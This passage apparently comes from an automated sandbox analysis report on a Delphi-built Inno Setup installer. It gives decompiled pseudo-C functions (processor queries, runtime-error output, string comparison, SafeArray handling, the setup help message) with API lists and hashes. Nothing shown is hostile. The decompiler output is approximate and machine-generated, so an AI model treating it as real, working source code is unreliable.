                                                              • Part of subcall function 004078E0: CreateThread.KERNEL32 ref: 0040793A
                                                            • GetCurrentThread.KERNEL32 ref: 0049727F
                                                            • GetCurrentThreadId.KERNEL32 ref: 00497287
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Thread$Current$CreateErrorLast
                                                            • String ID: 0@G$XtI$l@
                                                            • API String ID: 3539746228-385768319
                                                            • Opcode ID: a4dc03de5b91be95089a9569e035fcfb45136a4f5e23dfed5c7514759ebadc63
                                                            • Instruction ID: 1159262e71bebd7e921a745d602ab6fc0c684f98ff6f66721209a3575415716a
                                                            • Opcode Fuzzy Hash: a4dc03de5b91be95089a9569e035fcfb45136a4f5e23dfed5c7514759ebadc63
                                                            • Instruction Fuzzy Hash: 2B31E2309287449EDB10EBB68C427AB7FE49F09304F40C87EE455973C1DA3CA545C799
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 36%
                                                            			E00406424(void* __edx) {
                                                            				signed int _v8;
                                                            				intOrPtr _v12;
                                                            				char _v16;
                                                            				char* _t23;
                                                            				intOrPtr _t29;
                                                            				intOrPtr _t39;
                                                            				void* _t41;
                                                            				void* _t43;
                                                            				intOrPtr _t44;
                                                            
                                                            				_t41 = _t43;
                                                            				_t44 = _t43 + 0xfffffff4;
                                                            				_v16 = 0;
                                                            				if(GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetLogicalProcessorInformation") == 0) {
                                                            					L10:
                                                            					_v8 = 0x40;
                                                            					goto L11;
                                                            				} else {
                                                            					_t23 =  &_v16;
                                                            					_push(_t23);
                                                            					_push(0);
                                                            					L00403808();
                                                            					if(_t23 != 0 || GetLastError() != 0x7a) {
                                                            						goto L10;
                                                            					} else {
                                                            						_v12 = E004053F0(_v16);
                                                            						_push(_t41);
                                                            						_push(E004064D2);
                                                            						_push( *[fs:edx]);
                                                            						 *[fs:edx] = _t44;
                                                            						_push( &_v16);
                                                            						_push(_v12);
                                                            						L00403808();
                                                            						_t29 = _v12;
                                                            						if(_v16 <= 0) {
                                                            							L8:
                                                            							_pop(_t39);
                                                            							 *[fs:eax] = _t39;
                                                            							_push(E004064D9);
                                                            							return E0040540C(_v12);
                                                            						} else {
                                                            							while( *((short*)(_t29 + 4)) != 2 ||  *((char*)(_t29 + 8)) != 1) {
                                                            								_t29 = _t29 + 0x18;
                                                            								_v16 = _v16 - 0x18;
                                                            								if(_v16 > 0) {
                                                            									continue;
                                                            								} else {
                                                            									goto L8;
                                                            								}
                                                            								goto L12;
                                                            							}
                                                            							_v8 =  *(_t29 + 0xa) & 0x0000ffff;
                                                            							E00407210();
                                                            							L11:
                                                            							return _v8;
                                                            						}
                                                            					}
                                                            				}
                                                            				L12:
                                                            			}













                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00406439
                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040643F
                                                            • GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 0040645B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: AddressErrorHandleLastModuleProc
                                                            • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                            • API String ID: 4275029093-79381301
                                                            • Opcode ID: 60cbd49ddd200d6d95d4e054eb85e0ada012a2fb0b751d352b1ba5f8ec496b5f
                                                            • Instruction ID: 8f5f9a4eb212fab3c4852abc810e80ead921d34dcce11bc4c58bc7a6251dba94
                                                            • Opcode Fuzzy Hash: 60cbd49ddd200d6d95d4e054eb85e0ada012a2fb0b751d352b1ba5f8ec496b5f
                                                            • Instruction Fuzzy Hash: 52116371D00208BEDB20EFA5D84576EBBA8EB40705F1184BBF815F32C1D67D9A908B1D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 43%
                                                            			E004076B8(void* __ecx) {
                                                            				long _v4;
                                                            				void* _t3;
                                                            				void* _t9;
                                                            
                                                            				if( *0x4bb058 == 0) {
                                                            					if( *0x4b7032 == 0) {
                                                            						_push(0);
                                                            						_push("Error");
                                                            						_push("Runtime error     at 00000000");
                                                            						_push(0);
                                                            						L00403780();
                                                            					}
                                                            					return _t3;
                                                            				} else {
                                                            					if( *0x4bb344 == 0xd7b2 &&  *0x4bb34c > 0) {
                                                            						 *0x4bb35c();
                                                            					}
                                                            					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1d,  &_v4, 0);
                                                            					_t9 = E00408240(0x40774c);
                                                            					return WriteFile(GetStdHandle(0xfffffff5), _t9, 2,  &_v4, 0);
                                                            				}
                                                            			}

                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
                                                            • GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
                                                            • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: FileHandleWrite
                                                            • String ID: Error$Runtime error at 00000000
                                                            • API String ID: 3320372497-2970929446
                                                            • Opcode ID: 06894f85802f1aca0c877f66b17294aabd6ee15dfccdef8be12070d3d0c4ead6
                                                            • Instruction ID: db14fa18f2a627875cbdcf208ba1e0af1765c14dc112cf76e17f9611cef7a876
                                                            • Opcode Fuzzy Hash: 06894f85802f1aca0c877f66b17294aabd6ee15dfccdef8be12070d3d0c4ead6
                                                            • Instruction Fuzzy Hash: DFF0C2A1A8C24079FA2077A94C47F5A269C8740B16F108A3FF610B61D1C7FD6584937E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00420524(void* __ebx, void* __esi) {
                                                            				intOrPtr _t4;
                                                            				intOrPtr _t6;
                                                            
                                                            				if(E0041FF68(6, 0) == 0) {
                                                            					_t4 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"NTDLL.DLL"), L"RtlCompareUnicodeString");
                                                            					 *0x4be914 = _t4;
                                                            					 *0x4be910 = E00420428;
                                                            					return _t4;
                                                            				} else {
                                                            					_t6 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"CompareStringOrdinal");
                                                            					 *0x4be910 = _t6;
                                                            					return _t6;
                                                            				}
                                                            			}

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,CompareStringOrdinal,004B5A2E,00000000,004B5A41), ref: 0042053E
                                                              • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                            • GetModuleHandleW.KERNEL32(NTDLL.DLL,RtlCompareUnicodeString,004B5A2E,00000000,004B5A41), ref: 00420559
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: HandleModule$AddressProc
                                                            • String ID: CompareStringOrdinal$NTDLL.DLL$RtlCompareUnicodeString$kernel32.dll
                                                            • API String ID: 1883125708-3870080525
                                                            • Opcode ID: b7bf267469631706014ef5b6a976724c1e29590bd579973413919bb6c8384525
                                                            • Instruction ID: 4ba185d4141586243d2650af69d43cb091b5da9faf927984522c9bbe9ad7037f
                                                            • Opcode Fuzzy Hash: b7bf267469631706014ef5b6a976724c1e29590bd579973413919bb6c8384525
                                                            • Instruction Fuzzy Hash: 04E08CF0B4232036E644FB672C0769929C51B85709BD04A3F7004BA1D7DBBE42659E2E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 77%
                                                            			E0042931C(short* __eax, intOrPtr __ecx, signed short* __edx) {
                                                            				char _v260;
                                                            				char _v768;
                                                            				char _v772;
                                                            				short* _v776;
                                                            				intOrPtr _v780;
                                                            				char _v784;
                                                            				signed int _v788;
                                                            				signed short* _v792;
                                                            				char _v796;
                                                            				char _v800;
                                                            				intOrPtr* _v804;
                                                            				signed short* _v808;
                                                            				void* __ebp;
                                                            				signed char _t55;
                                                            				signed int _t64;
                                                            				void* _t72;
                                                            				intOrPtr* _t83;
                                                            				void* _t103;
                                                            				void* _t105;
                                                            				void* _t108;
                                                            				void* _t109;
                                                            				intOrPtr* _t118;
                                                            				void* _t122;
                                                            				intOrPtr _t123;
                                                            				char* _t124;
                                                            				void* _t125;
                                                            
                                                            				_t110 = __ecx;
                                                            				_v780 = __ecx;
                                                            				_v808 = __edx;
                                                            				_v776 = __eax;
                                                            				if((_v808[0] & 0x00000020) == 0) {
                                                            					E00428FDC(0x80070057);
                                                            				}
                                                            				_t55 =  *_v808 & 0x0000ffff;
                                                            				if((_t55 & 0x00000fff) != 0xc) {
                                                            					_push(_v808);
                                                            					_push(_v776);
                                                            					L00427254();
                                                            					return E00428FDC(_v776);
                                                            				} else {
                                                            					if((_t55 & 0x00000040) == 0) {
                                                            						_v792 = _v808[4];
                                                            					} else {
                                                            						_v792 =  *(_v808[4]);
                                                            					}
                                                            					_v788 =  *_v792 & 0x0000ffff;
                                                            					_t103 = _v788 - 1;
                                                            					if(_t103 < 0) {
                                                            						L9:
                                                            						_push( &_v772);
                                                            						_t64 = _v788;
                                                            						_push(_t64);
                                                            						_push(0xc);
                                                            						L00427828();
                                                            						_t123 = _t64;
                                                            						if(_t123 == 0) {
                                                            							E00428D34(_t110);
                                                            						}
                                                            						E00429278(_v776);
                                                            						 *_v776 = 0x200c;
                                                            						 *((intOrPtr*)(_v776 + 8)) = _t123;
                                                            						_t105 = _v788 - 1;
                                                            						if(_t105 < 0) {
                                                            							L14:
                                                            							_t107 = _v788 - 1;
                                                            							if(E00429294(_v788 - 1, _t125) != 0) {
                                                            								L00427840();
                                                            								E00428FDC(_v792);
                                                            								L00427840();
                                                            								E00428FDC( &_v260);
                                                            								_v780(_t123,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
                                                            							}
                                                            							_t72 = E004292C4(_t107, _t125);
                                                            						} else {
                                                            							_t108 = _t105 + 1;
                                                            							_t83 =  &_v768;
                                                            							_t118 =  &_v260;
                                                            							do {
                                                            								 *_t118 =  *_t83;
                                                            								_t118 = _t118 + 4;
                                                            								_t83 = _t83 + 8;
                                                            								_t108 = _t108 - 1;
                                                            							} while (_t108 != 0);
                                                            							do {
                                                            								goto L14;
                                                            							} while (_t72 != 0);
                                                            							return _t72;
                                                            						}
                                                            					} else {
                                                            						_t109 = _t103 + 1;
                                                            						_t122 = 0;
                                                            						_t124 =  &_v772;
                                                            						do {
                                                            							_v804 = _t124;
                                                            							_push(_v804 + 4);
                                                            							_t23 = _t122 + 1; // 0x1
                                                            							_push(_v792);
                                                            							L00427830();
                                                            							E00428FDC(_v792);
                                                            							_push( &_v784);
                                                            							_t26 = _t122 + 1; // 0x1
                                                            							_push(_v792);
                                                            							L00427838();
                                                            							E00428FDC(_v792);
                                                            							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
                                                            							_t122 = _t122 + 1;
                                                            							_t124 = _t124 + 8;
                                                            							_t109 = _t109 - 1;
                                                            						} while (_t109 != 0);
                                                            						goto L9;
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004293D1
                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004293ED
                                                            • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00429426
                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004294A3
                                                            • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004294BC
                                                            • VariantCopy.OLEAUT32(?,?), ref: 004294F7
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                            • String ID:
                                                            • API String ID: 351091851-0
                                                            • Opcode ID: 098dc979d013d57468a629589b458cb88fc05e19e5f0a5a7df6b54d31b1502c0
                                                            • Instruction ID: 2fed5c09d90993a71d142947efe00684c7910c2ed580f9cb9a97fb5731140b2d
                                                            • Opcode Fuzzy Hash: 098dc979d013d57468a629589b458cb88fc05e19e5f0a5a7df6b54d31b1502c0
                                                            • Instruction Fuzzy Hash: 4B51EE75A012299FCB21DB59D981BDAB3FCAF0C304F8041DAF548E7211D634AF858F65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 34%
                                                            			E004AFA44(void* __eax, void* __ebx, void* __edi, void* __esi) {
                                                            				char _v8;
                                                            				char _v12;
                                                            				void* _t24;
                                                            				intOrPtr _t28;
                                                            				void* _t31;
                                                            				void* _t32;
                                                            				intOrPtr _t35;
                                                            
                                                            				_t32 = __esi;
                                                            				_t31 = __edi;
                                                            				_push(0);
                                                            				_push(0);
                                                            				_t24 = __eax;
                                                            				_push(_t35);
                                                            				_push(0x4aface);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t35;
                                                            				if(( *0x4c1d61 & 0x00000001) == 0) {
                                                            					E00407A20( &_v8);
                                                            				} else {
                                                            					E00407E48( &_v8, L"/ALLUSERS\r\nInstructs Setup to install in administrative install mode.\r\n/CURRENTUSER\r\nInstructs Setup to install in non administrative install mode.\r\n");
                                                            				}
                                                            				_push(L"The Setup program accepts optional command line parameters.\r\n\r\n/HELP, /?\r\nShows this information.\r\n/SP-\r\nDisables the This will install... Do you wish to continue? prompt at the beginning of Setup.\r\n/SILENT, /VERYSILENT\r\nInstructs Setup to be silent or very silent.\r\n/SUPPRESSMSGBOXES\r\nInstructs Setup to suppress message boxes.\r\n/LOG\r\nCauses Setup to create a log file in the user\'s TEMP directory.\r\n/LOG=\"filename\"\r\nSame as /LOG, except it allows you to specify a fixed path/filename to use for the log file.\r\n/NOCANCEL\r\nPrevents the user from cancelling during the installation process.\r\n/NORESTART\r\nPrevents Setup from restarting the system following a successful installation, or after a Preparing to Install failure that requests a restart.\r\n/RESTARTEXITCODE=exit code\r\nSpecifies a custom exit code that Setup is to return when the system needs to be restarted.\r\n/CLOSEAPPLICATIONS\r\nInstructs Setup to close applications using files that need to be updated.\r\n/NOCLOSEAPPLICATIONS\r\nPrevents Setup from closing applications using files that need to be updated.\r\n/FORCECLOSEAPPLICATIONS\r\nInstructs Setup to force close when closing applications.\r\n/FORCENOCLOSEAPPLICATIONS\r\nPrevents Setup from force closing when closing applications.\r\n/LOGCLOSEAPPLICATIONS\r\nInstructs Setup to create extra logging when closing applications for debugging purposes.\r\n/RESTARTAPPLICATIONS\r\nInstructs Setup to restart applications.\r\n/NORESTARTAPPLICATIONS\r\nPrevents Setup from restarting applications.\r\n/LOADINF=\"filename\"\r\nInstructs Setup to load the settings from the specified file after having checked the command line.\r\n/SAVEINF=\"filename\"\r\nInstructs Setup to save installation settings to the specified file.\r\n/LANG=language\r\nSpecifies the internal name of the language to use.\r\n/DIR=\"x:\\dirname\"\r\nOverrides the default directory name.\r\n/GROUP=\"folder name\"\r\nOverrides the default folder name.\r\n/NOICONS\r\nInstructs Setup to initially check the Don\'t create a Start Menu folder check box.\r\n/TYPE=type name\r\nOverrides the default setup type.\r\n/COMPONENTS=\"comma separated list of component names\"\r\nOverrides the default component settings.\r\n/TASKS=\"comma separated list of task names\"\r\nSpecifies a list of tasks that should be initially selected.\r\n/MERGETASKS=\"comma separated list of task names\"\r\nLike the /TASKS parameter, except the specified tasks will be merged with the set of tasks that would have otherwise been selected by default.\r\n/PASSWORD=password\r\nSpecifies the password to use.\r\n");
                                                            				_push(_v8);
                                                            				_push(_t24);
                                                            				_push(0x4b0f94);
                                                            				_push(L"For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline");
                                                            				E004087C4( &_v12, _t24, 5, _t31, _t32);
                                                            				MessageBoxW(0, E004084EC(_v12), L"Setup", 0x10);
                                                            				_pop(_t28);
                                                            				 *[fs:eax] = _t28;
                                                            				_push(E004AFAD5);
                                                            				return E00407A80( &_v12, 2);
                                                            			}










                                                            APIs
                                                            • MessageBoxW.USER32(00000000,00000000,Setup,00000010), ref: 004AFAAE
                                                            Strings
                                                            • The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will in, xrefs: 004AFA7C
                                                            • For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline, xrefs: 004AFA8A
                                                            • Setup, xrefs: 004AFA9E
                                                            • /ALLUSERSInstructs Setup to install in administrative install mode./CURRENTUSERInstructs Setup to install in non administrat, xrefs: 004AFA68
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID: /ALLUSERSInstructs Setup to install in administrative install mode./CURRENTUSERInstructs Setup to install in non administrat$For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline$Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will in
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 69%
                                                            			E0042F9B8(signed short* __eax, signed int __ecx, signed short* __edx, void* __edi, void* __fp0) {
                                                            				signed int _v8;
                                                            				signed char _v9;
                                                            				signed int _v12;
                                                            				signed int _v14;
                                                            				void* _v20;
                                                            				void* _v24;
                                                            				signed short* _v28;
                                                            				signed short* _v32;
                                                            				signed int _v48;
                                                            				void* __ebx;
                                                            				void* __ebp;
                                                            				signed int _t150;
                                                            				signed int _t272;
                                                            				intOrPtr _t328;
                                                            				intOrPtr _t331;
                                                            				intOrPtr _t339;
                                                            				intOrPtr _t347;
                                                            				intOrPtr _t355;
                                                            				void* _t360;
                                                            				void* _t362;
                                                            				intOrPtr _t363;
                                                            
                                                            				_t367 = __fp0;
                                                            				_t358 = __edi;
                                                            				_t360 = _t362;
                                                            				_t363 = _t362 + 0xffffffd4;
                                                            				_v8 = __ecx;
                                                            				_v32 = __edx;
                                                            				_v28 = __eax;
                                                            				_v9 = 1;
                                                            				_t272 =  *_v28 & 0x0000ffff;
                                                            				if((_t272 & 0x00000fff) >= 0x10f) {
                                                            					_t150 =  *_v32 & 0x0000ffff;
                                                            					if(_t150 != 0) {
                                                            						if(_t150 != 1) {
                                                            							if(E00430860(_t272,  &_v20) != 0) {
                                                            								_push( &_v14);
                                                            								_t273 =  *_v20;
                                                            								if( *((intOrPtr*)( *_v20 + 8))() == 0) {
                                                            									_t275 =  *_v32 & 0x0000ffff;
                                                            									if(( *_v32 & 0xfff) >= 0x10f) {
                                                            										if(E00430860(_t275,  &_v24) != 0) {
                                                            											_push( &_v12);
                                                            											_t276 =  *_v24;
                                                            											if( *((intOrPtr*)( *_v24 + 4))() == 0) {
                                                            												E00428BF0(0xb);
                                                            												goto L41;
                                                            											} else {
                                                            												if(( *_v28 & 0x0000ffff) == _v12) {
                                                            													_t143 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
                                                            													_v9 =  *(0x4b93d2 + _v8 * 2 + _t143) & 0x000000ff;
                                                            													goto L41;
                                                            												} else {
                                                            													_push( &_v48);
                                                            													L00427244();
                                                            													_push(_t360);
                                                            													_push(0x42fdb0);
                                                            													_push( *[fs:eax]);
                                                            													 *[fs:eax] = _t363;
                                                            													_t289 = _v12 & 0x0000ffff;
                                                            													E004299A4( &_v48, _t276, _v12 & 0x0000ffff, _v28, __edi, __fp0);
                                                            													if((_v48 & 0x0000ffff) != _v12) {
                                                            														E00428AF8(_t289);
                                                            													}
                                                            													_t131 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
                                                            													_v9 =  *(0x4b93d2 + _v8 * 2 + _t131) & 0x000000ff;
                                                            													_pop(_t328);
                                                            													 *[fs:eax] = _t328;
                                                            													_push(0x42fde5);
                                                            													return E00429278( &_v48);
                                                            												}
                                                            											}
                                                            										} else {
                                                            											E00428BF0(0xb);
                                                            											goto L41;
                                                            										}
                                                            									} else {
                                                            										_push( &_v48);
                                                            										L00427244();
                                                            										_push(_t360);
                                                            										_push(0x42fcf7);
                                                            										_push( *[fs:eax]);
                                                            										 *[fs:eax] = _t363;
                                                            										_t294 =  *_v32 & 0x0000ffff;
                                                            										E004299A4( &_v48, _t275,  *_v32 & 0x0000ffff, _v28, __edi, __fp0);
                                                            										if(( *_v32 & 0x0000ffff) != _v48) {
                                                            											E00428AF8(_t294);
                                                            										}
                                                            										_v9 = E0042F7D0( &_v48, _v8, _v32, _t358, _t360, _t367);
                                                            										_pop(_t331);
                                                            										 *[fs:eax] = _t331;
                                                            										_push(0x42fde5);
                                                            										return E00429278( &_v48);
                                                            									}
                                                            								} else {
                                                            									if(( *_v32 & 0x0000ffff) == _v14) {
                                                            										_t95 = ( *((intOrPtr*)( *_v20 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
                                                            										_v9 =  *(0x4b93d2 + _v8 * 2 + _t95) & 0x000000ff;
                                                            										goto L41;
                                                            									} else {
                                                            										_push( &_v48);
                                                            										L00427244();
                                                            										_push(_t360);
                                                            										_push(0x42fc52);
                                                            										_push( *[fs:eax]);
                                                            										 *[fs:eax] = _t363;
                                                            										_t299 = _v14 & 0x0000ffff;
                                                            										E004299A4( &_v48, _t273, _v14 & 0x0000ffff, _v32, __edi, __fp0);
                                                            										if((_v48 & 0x0000ffff) != _v14) {
                                                            											E00428AF8(_t299);
                                                            										}
                                                            										_t83 = ( *((intOrPtr*)( *_v20 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
                                                            										_v9 =  *(0x4b93d2 + _v8 * 2 + _t83) & 0x000000ff;
                                                            										_pop(_t339);
                                                            										 *[fs:eax] = _t339;
                                                            										_push(0x42fde5);
                                                            										return E00429278( &_v48);
                                                            									}
                                                            								}
                                                            							} else {
                                                            								E00428BF0(__ecx);
                                                            								goto L41;
                                                            							}
                                                            						} else {
                                                            							_v9 = E0042F550(_v8, 2);
                                                            							goto L41;
                                                            						}
                                                            					} else {
                                                            						_v9 = E0042F53C(0, 1);
                                                            						goto L41;
                                                            					}
                                                            				} else {
                                                            					if(_t272 != 0) {
                                                            						if(_t272 != 1) {
                                                            							if(E00430860( *_v32 & 0x0000ffff,  &_v24) != 0) {
                                                            								_push( &_v12);
                                                            								_t282 =  *_v24;
                                                            								if( *((intOrPtr*)( *_v24 + 4))() == 0) {
                                                            									_push( &_v48);
                                                            									L00427244();
                                                            									_push(_t360);
                                                            									_push(0x42fb63);
                                                            									_push( *[fs:eax]);
                                                            									 *[fs:eax] = _t363;
                                                            									_t306 =  *_v28 & 0x0000ffff;
                                                            									E004299A4( &_v48, _t282,  *_v28 & 0x0000ffff, _v32, __edi, __fp0);
                                                            									if((_v48 & 0xfff) !=  *_v28) {
                                                            										E00428AF8(_t306);
                                                            									}
                                                            									_v9 = E0042F7D0(_v28, _v8,  &_v48, _t358, _t360, _t367);
                                                            									_pop(_t347);
                                                            									 *[fs:eax] = _t347;
                                                            									_push(0x42fde5);
                                                            									return E00429278( &_v48);
                                                            								} else {
                                                            									if(( *_v28 & 0x0000ffff) == _v12) {
                                                            										_t44 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
                                                            										_v9 =  *(0x4b93d2 + _v8 * 2 + _t44) & 0x000000ff;
                                                            										goto L41;
                                                            									} else {
                                                            										_push( &_v48);
                                                            										L00427244();
                                                            										_push(_t360);
                                                            										_push(0x42facc);
                                                            										_push( *[fs:eax]);
                                                            										 *[fs:eax] = _t363;
                                                            										_t311 = _v12 & 0x0000ffff;
                                                            										E004299A4( &_v48, _t282, _v12 & 0x0000ffff, _v28, __edi, __fp0);
                                                            										if((_v48 & 0xfff) != _v12) {
                                                            											E00428AF8(_t311);
                                                            										}
                                                            										_t32 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
                                                            										_v9 =  *(0x4b93d2 + _v8 * 2 + _t32) & 0x000000ff;
                                                            										_pop(_t355);
                                                            										 *[fs:eax] = _t355;
                                                            										_push(0x42fde5);
                                                            										return E00429278( &_v48);
                                                            									}
                                                            								}
                                                            							} else {
                                                            								E00428BF0(__ecx);
                                                            								goto L41;
                                                            							}
                                                            						} else {
                                                            							_v9 = E0042F550(_v8, 0);
                                                            							goto L41;
                                                            						}
                                                            					} else {
                                                            						_v9 = E0042F53C(1, 0);
                                                            						L41:
                                                            						return _v9 & 0x000000ff;
                                                            					}
                                                            				}
                                                            			}
























                                                            0x0042faf7
                                                            0x00000000
                                                            0x0042fa56
                                                            0x0042fa59
                                                            0x0042fa5a
                                                            0x0042fa61
                                                            0x0042fa62
                                                            0x0042fa67
                                                            0x0042fa6a
                                                            0x0042fa6d
                                                            0x0042fa77
                                                            0x0042fa88
                                                            0x0042fa8a
                                                            0x0042fa8a
                                                            0x0042faae
                                                            0x0042fab3
                                                            0x0042fab8
                                                            0x0042fabb
                                                            0x0042fabe
                                                            0x0042facb
                                                            0x0042facb
                                                            0x0042fa54
                                                            0x0042fa24
                                                            0x0042fa24
                                                            0x00000000
                                                            0x0042fa24
                                                            0x0042f9fe
                                                            0x0042fa0a
                                                            0x00000000
                                                            0x0042fa0a
                                                            0x0042f9e7
                                                            0x0042f9f0
                                                            0x0042fde5
                                                            0x0042fded
                                                            0x0042fded
                                                            0x0042f9e5

                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c6922fb93c990c72bf9a49bf3daa94017bfe3b7264ddd93f55e738123a9900a9
                                                            • Instruction ID: 1b6310f250808118d38827de8a535e3b6e70e535f73b2508e71121fbf0c58563
